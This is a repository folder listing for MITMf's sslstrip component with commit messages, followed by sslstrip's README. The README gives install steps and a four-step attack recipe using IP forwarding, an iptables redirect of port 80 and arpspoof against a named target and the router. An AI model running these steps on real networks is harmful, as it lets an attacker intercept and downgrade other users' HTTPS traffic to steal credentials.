MITMf/core/sslstrip
byt3bl33d3r 14580f1589 second implementation of the HTTP server, you can now define shares for the SMB server in the config file, added an option to switch between the normal SMB server and the Karma version.
removed some useless code (left over from the responder plugin), serverResponseStatus hook now returns a dict (tuple was causing errors)
2015-05-30 15:00:41 +02:00
..
__init__.py Version bump 2015-03-30 18:04:24 +02:00
ClientRequest.py Fixed a bug in SSLstrip+ code, when redirecting to certain sites 2015-05-19 00:00:40 +02:00
CookieCleaner.py Version bump 2015-03-30 18:04:24 +02:00
COPYING.sslstrip Version bump 2015-03-30 18:04:24 +02:00
DnsCache.py fixed some output 2015-04-16 01:38:28 +02:00
README.md Version bump 2015-03-30 18:04:24 +02:00
ServerConnection.py second implementation of the HTTP server, you can now define shares for the SMB server in the config file, added an option to switch between the normal SMB server and the Karma version. 2015-05-30 15:00:41 +02:00
ServerConnectionFactory.py initial dynamic config support 2015-04-19 23:33:44 +02:00
SSLServerConnection.py Fixed a bug in SSLstrip+ code, when redirecting to certain sites 2015-05-19 00:00:40 +02:00
StrippingProxy.py Version bump 2015-03-30 18:04:24 +02:00
URLMonitor.py Fixed a bug in SSLstrip+ code, when redirecting to certain sites 2015-05-19 00:00:40 +02:00

sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.

It requires Python 2.5 or newer, along with the 'twisted' python module.

Installing: * Unpack: tar zxvf sslstrip-0.5.tar.gz * Install twisted: sudo apt-get install python-twisted-web * (Optionally) run 'python setup.py install' as root to install, or you can just run it out of the directory.

Running: sslstrip can be run from the source base without installation.
Just run 'python sslstrip.py -h' as a non-root user to get the command-line options.

The four steps to getting this working (assuming you're running Linux) 
are:

1) Flip your machine into forwarding mode (as root):
   echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

3) Run sslstrip with the command-line options you'd like (see above).

4) Run arpspoof to redirect traffic to your machine (as root):
   arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>

More Info: http://www.thoughtcrime.org/software/sslstrip/